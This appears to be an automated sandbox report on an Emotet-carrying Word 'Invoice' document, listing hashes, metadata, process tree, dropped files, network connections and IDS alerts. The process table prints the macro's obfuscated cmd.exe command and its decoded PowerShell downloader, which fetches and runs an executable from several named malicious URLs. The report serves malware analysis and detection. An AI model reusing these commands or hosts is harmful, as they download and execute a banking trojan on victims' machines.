download: | Invoice |
Full analysis: | https://app.any.run/tasks/62040207-8edb-404b-bfd2-e8389ba87192 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 06, 2018, 17:29:51 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 6 16:36:00 2018, Last Saved Time/Date: Thu Dec 6 16:36:00 2018, Number of Pages: 1, Number of Words: 3, Number of Characters: 19, Security: 0 |
MD5: | 9CFE90E71789C4471CC7AABA1F464172 |
SHA1: | B57ED2FA9A15CC0E11F4F52043803D079E274A2D |
SHA256: | 79581B2546412CE896E213275E07E854FBADEEFFAF879CAB5D3683B40F0BA341 |
SSDEEP: | 1536:N81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9VhukWpQ0B3PZ0qoiIc:N8GhDS0o9zTGOZD6EbzCdvh/0L0qZ |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 21 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 19 |
Words: | 3 |
Pages: | 1 |
ModifyDate: | 2018:12:06 16:36:00 |
CreateDate: | 2018:12:06 16:36:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3440 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Invoice.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 Modules
| |||||||||||||||
2364 | c:\CidOFIsHOvnzA\wWFwFduFCN\DQTSlcf\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set xv=MsHiWLUQEdwaJGRw-po4tulK=:/' 8In9+5Vm)TNBxDf@jy$kYS{,;}grv0hAPX6C.bFcez(\q&&for %C in (47;64;68;21;24;27;62;22;73;27;53;47;62;45;70;24;31;69;15;16;18;66;45;69;68;20;28;39;69;20;65;4;69;66;64;22;3;69;31;20;53;47;60;23;1;24;27;59;20;20;17;25;26;26;66;69;20;59;56;18;15;65;68;18;65;21;48;26;22;0;61;8;44;59;20;20;17;25;26;26;36;18;43;11;66;22;69;1;65;68;18;36;26;26;38;44;59;20;20;17;25;26;26;36;69;22;22;43;18;56;1;65;68;18;36;26;31;14;59;36;40;17;15;5;44;59;20;20;17;25;26;26;22;3;57;3;31;55;36;69;1;1;11;55;69;68;59;21;56;68;59;65;68;18;36;26;30;49;32;55;62;34;36;38;44;59;20;20;17;1;25;26;26;68;21;1;20;18;36;69;9;3;11;65;69;1;26;3;27;65;50;17;22;3;20;71;27;44;27;37;53;47;3;60;43;24;27;13;6;70;27;53;47;49;15;61;28;24;28;27;32;19;63;27;53;47;45;50;13;24;27;17;15;67;27;53;47;59;57;40;24;47;69;31;57;25;20;69;36;17;33;27;72;27;33;47;49;15;61;33;27;65;69;41;69;27;53;43;18;56;69;11;68;59;71;47;13;9;48;28;3;31;28;47;60;23;1;37;51;20;56;46;51;47;62;45;70;65;42;18;15;31;22;18;11;9;67;3;22;69;71;47;13;9;48;52;28;47;59;57;40;37;53;47;0;49;61;24;27;60;35;3;27;53;30;43;28;71;71;13;69;20;16;30;20;69;36;28;47;59;57;40;37;65;22;69;31;55;20;59;28;16;55;69;28;29;58;58;58;58;37;28;51;30;31;57;18;48;69;16;30;20;69;36;28;47;59;57;40;53;47;14;38;57;24;27;60;42;61;27;53;66;56;69;11;48;53;54;54;68;11;20;68;59;51;54;54;47;22;68;67;24;27;62;73;39;27;53;74)do set 953n=!953n!!xv:~%C,1!&&if %C gtr 73 echo !953n:~-428!|FOR /F "delims=7OCsi. tokens=5" %W IN ('assoc.psc1')DO %W -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
2932 | CmD /V/C"set xv=MsHiWLUQEdwaJGRw-po4tulK=:/' 8In9+5Vm)TNBxDf@jy$kYS{,;}grv0hAPX6C.bFcez(\q&&for %C in (47;64;68;21;24;27;62;22;73;27;53;47;62;45;70;24;31;69;15;16;18;66;45;69;68;20;28;39;69;20;65;4;69;66;64;22;3;69;31;20;53;47;60;23;1;24;27;59;20;20;17;25;26;26;66;69;20;59;56;18;15;65;68;18;65;21;48;26;22;0;61;8;44;59;20;20;17;25;26;26;36;18;43;11;66;22;69;1;65;68;18;36;26;26;38;44;59;20;20;17;25;26;26;36;69;22;22;43;18;56;1;65;68;18;36;26;31;14;59;36;40;17;15;5;44;59;20;20;17;25;26;26;22;3;57;3;31;55;36;69;1;1;11;55;69;68;59;21;56;68;59;65;68;18;36;26;30;49;32;55;62;34;36;38;44;59;20;20;17;1;25;26;26;68;21;1;20;18;36;69;9;3;11;65;69;1;26;3;27;65;50;17;22;3;20;71;27;44;27;37;53;47;3;60;43;24;27;13;6;70;27;53;47;49;15;61;28;24;28;27;32;19;63;27;53;47;45;50;13;24;27;17;15;67;27;53;47;59;57;40;24;47;69;31;57;25;20;69;36;17;33;27;72;27;33;47;49;15;61;33;27;65;69;41;69;27;53;43;18;56;69;11;68;59;71;47;13;9;48;28;3;31;28;47;60;23;1;37;51;20;56;46;51;47;62;45;70;65;42;18;15;31;22;18;11;9;67;3;22;69;71;47;13;9;48;52;28;47;59;57;40;37;53;47;0;49;61;24;27;60;35;3;27;53;30;43;28;71;71;13;69;20;16;30;20;69;36;28;47;59;57;40;37;65;22;69;31;55;20;59;28;16;55;69;28;29;58;58;58;58;37;28;51;30;31;57;18;48;69;16;30;20;69;36;28;47;59;57;40;53;47;14;38;57;24;27;60;42;61;27;53;66;56;69;11;48;53;54;54;68;11;20;68;59;51;54;54;47;22;68;67;24;27;62;73;39;27;53;74)do set 953n=!953n!!xv:~%C,1!&&if %C gtr 73 echo !953n:~-428!|FOR /F "delims=7OCsi. tokens=5" %W IN ('assoc.psc1')DO %W -" | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
3120 | C:\Windows\system32\cmd.exe /S /D /c" echo $Ccu='Xlq';$Xjz=new-object Net.WebClient;$AKs='http://bethrow.co.uk/lMPE@http://mofables.com//T@http://mellfors.com/nRhmBpwL@http://livingmessagechurch.com/IY9gX5mT@https://customedia.es/i'.Split('@');$iAf='GUz';$YwP = '946';$jSG='pwF';$hvB=$env:temp+'\'+$YwP+'.exe';foreach($Gdk in $AKs){try{$Xjz.DownloadFile($Gdk, $hvB);$MYP='AVi';If ((Get-Item $hvB).length -ge 80000) {Invoke-Item $hvB;$RTv='ADP';break;}}catch{}}$lcF='XqN';" | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
3260 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=7OCsi. tokens=5" %W IN ('assoc.psc1') DO %W -" | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
3988 | C:\Windows\system32\cmd.exe /c assoc.psc1 | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
2836 | PowerShell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3000 | "C:\Users\admin\AppData\Local\Temp\946.exe" | C:\Users\admin\AppData\Local\Temp\946.exe | — | powershell.exe | |||||||||||
User: admin Company: Nexon Corp. Integrity Level: MEDIUM Description: Softpub Specialer DLL Exit code: 0 Version: 6.1.7600.1 Modules
| |||||||||||||||
3856 | "C:\Users\admin\AppData\Local\Temp\946.exe" | C:\Users\admin\AppData\Local\Temp\946.exe | 946.exe | ||||||||||||
User: admin Company: Nexon Corp. Integrity Level: MEDIUM Description: Softpub Specialer DLL Exit code: 0 Version: 6.1.7600.1 Modules
| |||||||||||||||
952 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 946.exe | |||||||||||
User: admin Company: Nexon Corp. Integrity Level: MEDIUM Description: Softpub Specialer DLL Exit code: 0 Version: 6.1.7600.1 Modules
|
PID | Process | Filename | Type | |
---|---|---|---|---|
3440 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA6C3.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2836 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZW7JJYVHBQBY5XYG8OJS.temp | — | |
MD5:— | SHA256:— | |||
3440 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\query[1].asmx | — | |
MD5:— | SHA256:— | |||
2836 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13b4ec.TMP | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
3856 | 946.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:465C7FB95C45008DDC6B940624745430 | SHA256:21355753A277813CF58A348E389FA4FEEBCA3F819BA7C78A8AB679A4F63D1953 | |||
2836 | powershell.exe | C:\Users\admin\AppData\Local\Temp\946.exe | executable | |
MD5:465C7FB95C45008DDC6B940624745430 | SHA256:21355753A277813CF58A348E389FA4FEEBCA3F819BA7C78A8AB679A4F63D1953 | |||
3440 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\ONetConfig\b6419f5bc3093b5f22142ce454e02407.xml | xml | |
MD5:CE6D8D5BBDFC40DBB82256D76A15A0D5 | SHA256:037A1BD2C94328814C856840E04C739ABFC2EE7D41C60215FD22EAA12E84A721 | |||
3440 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:4F5F40C47DDD92765B47161B15380CF9 | SHA256:3A34E29F643B0F7C1B38279E3FA88B8310EFE43FDAF57CAE22CE4944767D3F29 | |||
3440 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\ONetConfig\b6419f5bc3093b5f22142ce454e02407.sig | binary | |
MD5:BD60B225C6044C5EAB56D81000077770 | SHA256:E41A09E8BC883088C4B8284F94F7673D18CE8C7C66DF147C64D4ABD0B74DB452 | |||
2836 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2836 | powershell.exe | GET | 301 | 91.186.0.8:80 | http://bethrow.co.uk/lMPE | GB | html | 234 b | malicious |
2836 | powershell.exe | GET | 200 | 91.186.0.8:80 | http://bethrow.co.uk/lMPE/ | GB | executable | 120 Kb | malicious |
3440 | WINWORD.EXE | GET | 200 | 52.109.32.27:80 | http://office14client.microsoft.com/config14?UILCID=1033&CLCID=1033&ILCID=1033&HelpLCID=1033&App={019C826E-445A-4649-A5B0-0BF08FCC4EEE}&build=14.0.6023 | GB | xml | 1.99 Kb | whitelisted |
2636 | archivesymbol.exe | GET | 200 | 189.223.176.239:7080 | http://189.223.176.239:7080/ | MX | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2636 | archivesymbol.exe | 189.223.176.239:7080 | — | Uninet S.A. de C.V. | MX | malicious |
3440 | WINWORD.EXE | 52.109.120.29:443 | rr.office.microsoft.com | Microsoft Corporation | HK | whitelisted |
2836 | powershell.exe | 91.186.0.8:80 | bethrow.co.uk | Simply Transit Ltd | GB | malicious |
3440 | WINWORD.EXE | 52.109.32.27:80 | office14client.microsoft.com | Microsoft Corporation | GB | whitelisted |
Domain | IP | Reputation |
---|---|---|
bethrow.co.uk |
| malicious |
office14client.microsoft.com |
| whitelisted |
rr.office.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
2836 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2836 | powershell.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
2836 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2836 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2836 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2636 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
2636 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |